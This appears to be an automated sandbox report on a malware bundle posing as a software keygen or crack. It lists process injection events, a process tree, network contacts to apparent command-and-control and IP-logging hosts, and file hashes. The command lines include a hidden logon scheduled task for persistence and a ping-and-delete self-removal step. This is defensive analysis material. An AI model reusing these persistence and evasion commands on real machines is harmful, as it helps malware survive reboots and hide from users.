PID 624 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 624 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 624 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 624 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 624 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 840 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
PID 840 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
PID 840 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
PID 840 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
PID 624 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 624 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 624 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 624 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 624 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 624 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 624 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 624 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 624 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 624 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 860 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe

Uses Task Scheduler COM API

persistence

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\keygen.bat"

C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe

keygen-pr.exe -p83fsase3Ge

C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe

keygen-step-1.exe

C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe

keygen-step-6.exe

C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe

keygen-step-3.exe

C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe

keygen-step-4.exe

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731104712 0

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe" -a

C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe -txt -scanlocal -file:potato.dat

C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe"

C:\Users\Admin\AppData\Local\Temp\chrome3.exe

"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe

"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"

C:\Users\Admin\AppData\Local\Temp\2.exe

"C:\Users\Admin\AppData\Local\Temp\2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2976 -s 136

C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

Network

Country Destination Domain Proto
US 8.8.8.8:53 kvaka.li udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
US 8.8.8.8:53 kvaka.li udp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
RU 186.2.171.3:80 186.2.171.3 tcp
GB 195.200.9.205:443 evaexpand.com tcp
RU 186.2.171.3:443 186.2.171.3 tcp
US 8.8.8.8:53 cleaner-partners.biz udp
US 8.8.8.8:53 evaexpand.com udp
GB 91.108.103.98:443 evaexpand.com tcp
UA 194.145.227.161:80 tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 remotenetwork.xyz udp
GB 195.200.9.205:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
US 8.8.8.8:53 startupmart.bar udp
GB 195.200.9.135:443 evaexpand.com tcp
GB 195.200.9.135:443 evaexpand.com tcp
GB 195.200.9.135:443 evaexpand.com tcp
GB 195.200.9.135:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 185.77.97.228:443 evaexpand.com tcp
GB 185.77.97.228:443 evaexpand.com tcp
GB 185.77.97.228:443 evaexpand.com tcp
GB 185.77.97.228:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 91.108.103.98:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
US 208.95.112.1:80 ip-api.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 185.77.97.228:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
US 8.8.8.8:53 best-supply-link.xyz udp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.135:443 evaexpand.com tcp
GB 195.200.9.135:443 evaexpand.com tcp
GB 195.200.9.135:443 evaexpand.com tcp
GB 195.200.9.135:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.135:443 evaexpand.com tcp
GB 195.200.9.135:443 evaexpand.com tcp
GB 195.200.9.135:443 evaexpand.com tcp
GB 195.200.9.135:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
US 8.8.8.8:53 www.wpdsfds23x.com udp
US 8.8.8.8:53 evaexpand.com udp
GB 185.77.97.228:443 evaexpand.com tcp
US 104.26.3.46:443 iplogger.org tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.135:443 evaexpand.com tcp
GB 195.200.9.135:443 evaexpand.com tcp
GB 195.200.9.135:443 evaexpand.com tcp
GB 195.200.9.135:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.205:443 evaexpand.com tcp
US 8.8.8.8:53 oldhorse.info udp
US 8.8.8.8:53 2no.co udp
US 104.21.79.229:443 2no.co tcp
US 104.21.79.229:443 2no.co tcp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.18:80 crl.microsoft.com tcp
US 8.8.8.8:53 one-online-gam3s.com udp
US 8.8.8.8:53 oneeuropegroup.xyz udp
US 8.8.8.8:53 gensolutions.bar udp
US 104.21.79.229:443 2no.co tcp
SG 37.0.10.214:80 tcp
UA 194.145.227.161:80 tcp
SG 37.0.10.244:80 tcp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
MX 31.210.20.251:80 tcp
UA 194.145.227.161:80 tcp
UA 194.145.227.161:80 tcp
UA 194.145.227.161:80 tcp

Files

memory/2788-0-0x00000000000C0000-0x00000000000D8000-memory.dmp

memory/2864-5-0x00000000005D0000-0x00000000006B5000-memory.dmp

C:\Windows\winnetdriv.exe

MD5 265cadde82b0c66dc39ad2d9ee800754
SHA1 2e9604eade6951d5a5b4a44bee1281e32166f395
SHA256 40fd6a0b671a0e5074a206201f57f7731a0d01baab5874b28a9b0f019a451c5a
SHA512 c99f3a5464e1ac02402814401c2cb66a9fafb794356395c1081bdf3c4c3534086498c19efe4055780a52a1bb80db81658c2cb4af5271015af51edf7bd3865e7b

memory/2836-19-0x0000000000280000-0x0000000000365000-memory.dmp

\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe

MD5 7126148bfe5ca4bf7e098d794122a9a3
SHA1 3fe6be3ee8bf1a0c99139b146913c8c6acd7dd64
SHA256 f8c0350d71e5dd14438d477f73915c4845290c7f0620656624722183b76013f5
SHA512 0bec6450d1be17489436de7a5186dbcb88089edd4227c3b5484460c9368e5ca0a2d88c385d31989f449a5d8cc347057c80a997682d6c0ed1b9cfcb85c677eb48

\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe

MD5 51ef03c9257f2dd9b93bfdd74e96c017
SHA1 3baa7bee4b4b7d3ace13409d69dc7bcd0399ac34
SHA256 82a022b29bda763ef9f2ce01c82c82e199182d1d0243cca9811eccc1d993cecf
SHA512 2c97e5d08c9be89ca45153511e0976abfabf41e25d4187dcb7586ba125b6d8d763b99e79043ac1504203c26c7ab47a9246d9a0235b469f6c611703d4e2ae00e1

C:\Users\Admin\AppData\Local\Temp\RarSFX0\JOzWR.dat

MD5 12476321a502e943933e60cfb4429970
SHA1 c71d293b84d03153a1bd13c560fca0f8857a95a7
SHA256 14a0fbd7eab461e49ee161ac3bd9ad8055086dbe56848dbaba9ec2034b3dea29
SHA512 f222de8febc705146394fd389e6cece95b077a0629e18eab91c49b139bf5b686435e28a6ada4a0dbb951fd24ec3db692e7a5584d57ffd0e851739e595f2bbfdc

memory/2172-77-0x0000000000400000-0x0000000000983000-memory.dmp

\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe

MD5 8902f8193024fa4187ca1aad97675960
SHA1 37a4840c9657205544790c437698b54ca33bfd9d
SHA256 95de484851569f225488320d573e398ebc2312b2d85b6c2b255b63b21aebb82f
SHA512 c351204604cb24c45ddb26847a22f5487a2942ad2b2361dbd31ce0a308c281be91658907d7fe04b483f053b7f9b0c680cae11361709ba7552f7921e727241938

memory/2172-89-0x0000000000400000-0x0000000000983000-memory.dmp

memory/860-110-0x0000000000B70000-0x0000000000D46000-memory.dmp

memory/2172-108-0x0000000000400000-0x0000000000983000-memory.dmp

memory/2172-107-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2172-105-0x0000000000400000-0x0000000000983000-memory.dmp

memory/2172-103-0x0000000000400000-0x0000000000983000-memory.dmp

memory/2172-101-0x0000000000400000-0x0000000000983000-memory.dmp

memory/2172-99-0x0000000000400000-0x0000000000983000-memory.dmp

memory/2172-111-0x0000000000400000-0x0000000000983000-memory.dmp

memory/2172-114-0x0000000000400000-0x0000000000983000-memory.dmp

memory/2172-97-0x0000000000400000-0x0000000000983000-memory.dmp

memory/2172-122-0x0000000000400000-0x0000000000983000-memory.dmp

memory/2172-96-0x0000000000400000-0x0000000000983000-memory.dmp

\Users\Admin\AppData\Local\Temp\chrome3.exe

MD5 4b0d49f7c8712d7a0d44306309f2e962
SHA1 5f0a2536f215babccf860c7ccdeaf7055bb59cad
SHA256 f996915ce7203dc3661afa686637426fab14c91682ada02054d2f64ce245af60
SHA512 50dc00bebdafdc2cc1792a45cab5f13773ff0026c20618eec29f50000261afba65f58cec5d30be0fd5aaea17cac30b97b16be70c6f430987cd10a8488948ee2b

\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe

MD5 13e802bd360e44591d7d23036ce1fd33
SHA1 091a58503734848a4716382862526859299ef345
SHA256 e24c3eda7673062c9b243a09bc91e608f4d9dcc5de27db025b5ad150ae014f2b
SHA512 8bb52a3b0852cc345be7d4b50b19c3778bcae5cb7ee654aced93772bee6fd22d1e87c484d91afb10af040d7c52b0f1e0b60de47a28d8eeea5e3c6afcead6163b

C:\Users\Admin\AppData\Local\Temp\2.exe

MD5 a5bace3c3c2fa1cb766775746a046594
SHA1 9998cad5ba39e0be94347fcd2a2affd0c0a25930
SHA256 617de4cdc27fb67b299a0d95ff2129d0ea2488040bcfd5f64868a0fab33af7a6
SHA512 66f0cb5b820014a8d73bab706de8138d22a4d690d77726ac53b785daf99ed45646c8b0236bf10e209039f78324a63c3ee1c2f7ccf852fa7d579753cb9f659184

\Users\Admin\AppData\Local\Temp\setup.exe

MD5 0ebb4afbb726f3ca17896a0274b78290
SHA1 b543a593cfa0cc84b6af0457ccdc27c1b42ea622
SHA256 2fd099e9c096efb59756565d50243387d7669d60c2088e842f1f5d9ef297b6d2
SHA512 284063f08667af11bc593dcb88f19d2bc6b9fd1e2edf368fdc78f07c9956fa3078673ee7dd7ca349e32cb1f848edfeab3b6a758eac5e5c3d36dc1a8764353d11

memory/2172-130-0x0000000000400000-0x0000000000983000-memory.dmp

memory/2172-131-0x0000000000400000-0x0000000000983000-memory.dmp

memory/2172-92-0x0000000000400000-0x0000000000983000-memory.dmp

\Users\Admin\AppData\Local\Temp\jhuuee.exe

MD5 f9be28007149d38c6ccb7a7ab1fcf7e5
SHA1 eba6ac68efa579c97da96494cde7ce063579d168
SHA256 5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914
SHA512 8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171

memory/1068-169-0x0000000000940000-0x0000000000960000-memory.dmp

memory/1212-167-0x0000000001290000-0x0000000001298000-memory.dmp

\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe

MD5 f250a9c692088cce4253332a205b1649
SHA1 109c79124ce2bda06cab50ea5d97294d13d42b20
SHA256 0a6c3a23510f93fcdcb6d5acc53ccccbcc51c68f14b1bcbd758ffbf135f8e882
SHA512 80553664f188ae35cef1f89d188fb17df8a490367f8d6fa5f9897115bacf776373905bccd599353add684c7fa6c2554d04cbf1a7f6cc87b299d6c51da33c1b5e

memory/840-187-0x0000000003F60000-0x00000000041C7000-memory.dmp

memory/840-186-0x0000000003F60000-0x00000000041C7000-memory.dmp

memory/1688-188-0x0000000000400000-0x0000000000667000-memory.dmp

memory/840-185-0x0000000003F60000-0x00000000041C7000-memory.dmp

memory/840-184-0x0000000003F60000-0x00000000041C7000-memory.dmp

memory/1992-166-0x000000013FA50000-0x000000013FA60000-memory.dmp

memory/1068-191-0x0000000000150000-0x000000000016A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab1A25.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 159ecc509d6a35faa22c4a151df3f057
SHA1 adeaf921fac0edec67abf854b7d4104d8707526b
SHA256 fc71c207dbeb505020afc7729d4ff1e3666e0c9fbfe27360dcea1d5d14788f63
SHA512 a1b0a09f34a70ab18fda710d118a58ef4eaf0191d75101fbceda2a39ad655f981fc27a87ab1af55c82ace968860854b7893e97d8bafc65cc859bb718d67c881d

C:\Users\Admin\AppData\Local\Temp\Tar1AF3.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

memory/2784-209-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2172-210-0x0000000000400000-0x0000000000983000-memory.dmp

memory/2172-211-0x0000000000400000-0x0000000000983000-memory.dmp

memory/2172-212-0x0000000000400000-0x0000000000983000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\potato.dat

MD5 5e4e6b664563bf1b7f9ed844280507e5
SHA1 3c5a37e8af1964d87898c590f598d95779ae5bc2
SHA256 25ad9ded5f385b5bbe35029a9c990d0a541e9a23058ae545bb3ae0573509a82e
SHA512 9cdb5213613325d5aac931a6e43242f1a642d1cfdaa8540907aaf79bdbc16a4188e2416875985934d330ab360c5dd5b276543b8f73e41106e317f105a8f041c9

memory/1688-219-0x0000000000400000-0x0000000000667000-memory.dmp

memory/2276-218-0x0000000000400000-0x0000000002B59000-memory.dmp

memory/1992-224-0x0000000000650000-0x000000000065E000-memory.dmp

memory/2708-231-0x000000013F750000-0x000000013F760000-memory.dmp

memory/1688-233-0x0000000000400000-0x0000000000667000-memory.dmp

\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe

MD5 0388a1ce1bb8c076387b69ffcb3b40ec
SHA1 3ec08a53ec024d9be6346440848c37d0e0d7bb80
SHA256 448febc4311881856de2c237285907fe9470818e169946b0dbf1362f332e070a
SHA512 ea5af764d0373c8b9a5faf6d7094c76c9c321e227713bceecd49df50fa888e8fd04b1dfe16c4b75a8727717582b06383825e5d4317db1b875951ee240edd71d5

\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe

MD5 9a6071c1a67be3fb247f857fe5903bbf
SHA1 4a2e14763c51537e8695014007eceaf391a3f600
SHA256 01a9cb71df1d038bbec243ec7f2c1dd12d65a735297469c7f72be80886842e3c
SHA512 c862ed8670b48e23b081e1c91280599ffdd963e714665b80553b41540cb3584c823a25f05c75e47eaea1473c687a9ef7c9a219d724d059e5bd77ac6d127f5e68

memory/2516-263-0x0000000000160000-0x000000000017E000-memory.dmp

memory/2976-252-0x0000000000400000-0x0000000002B4E000-memory.dmp

memory/2516-264-0x00000000003E0000-0x00000000003FA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe

MD5 7009fb80a52366b6c2cd8ec052a65791
SHA1 db0894463edf3ac11e5ca4b4584e8f10d75810f6
SHA256 767c546decf6f669263e4a0a87a0f5d92234e031e9a0de3733fa954a8f3e0255
SHA512 26e50e4b3d0b5fe866423b9ae0c02f61882f632fe4a16c05da117c02fae9aea26a6c81458e4b0bc2bda8acd0407565132f8bd6b7d3e828dd90fc280b1f15f079

memory/2664-279-0x000000013F640000-0x000000013F646000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 cd497d63ebb26b517399def2adbe9649
SHA1 c89c864c307c9fa5f6828c3793234af86cad4494
SHA256 ebf6e92a8c9f713b2cb6e24593ca755e5cc60c4d8a708cbd96088c6c745d6143
SHA512 15198e24b5814356633d6fefcf16e53c0a057a3dd8ed313cbf96899570bbf9d240a305800f1f02ce9922d2e566b3004daa8a868bece88f0b58a13881504f2506

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 cf65056f7ed56237f0087a152181e89e
SHA1 1d5c07b564c7da1204df557f24dbcba2d96d40f5
SHA256 e7aad286f60d402e6d1e57b5f89b40c150578098fea7a9f60ac37ce39018b4f3
SHA512 4c9cd3ac0b8e473331e7e96a1b045acb696117945ce6139cc4f4718bd4af1dcd3fd2e1a409ab02c7a0ad0fd713624bc825a71dbceaeb71ff694a94b2863576d7

memory/840-429-0x0000000003F60000-0x00000000041C7000-memory.dmp

memory/840-430-0x0000000003F60000-0x00000000041C7000-memory.dmp